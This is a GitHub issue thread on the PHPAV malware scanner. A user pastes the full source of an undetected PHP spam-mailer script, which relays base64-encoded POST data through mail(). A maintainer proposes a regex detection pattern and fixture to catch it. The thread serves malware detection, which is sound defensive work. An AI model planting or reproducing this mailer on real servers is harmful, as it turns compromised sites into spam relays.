search

nexylan / PHPAV

PHP CLI Virus/Malware Scanner
MIT License
27 stars 7 forks source link

spam mail file undetected #34

Open Hugo-Carattoni opened 7 years ago

Hugo-Carattoni commented 7 years ago

This type of file are not detected:

if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
        {
        echo "indata_error";
        exit;
        }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
        {
        echo "indata_error";
        exit;
        }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
        echo "sent_ok";
else
        echo "sent_error";
?>
gallart commented 7 years ago

Hello Hugo,

Can you propose merge resquest with this new pattern as webshell + fixture file ? (see my previous MR)

base64_decode\(\$_POST\["mailto"\]\);

Thanks,

Gaëtan

soullivaneuh commented 7 years ago

Please use code blocks for snippet. I corrected your post @Hugo-Carattoni

More information here: https://guides.github.com/features/mastering-markdown/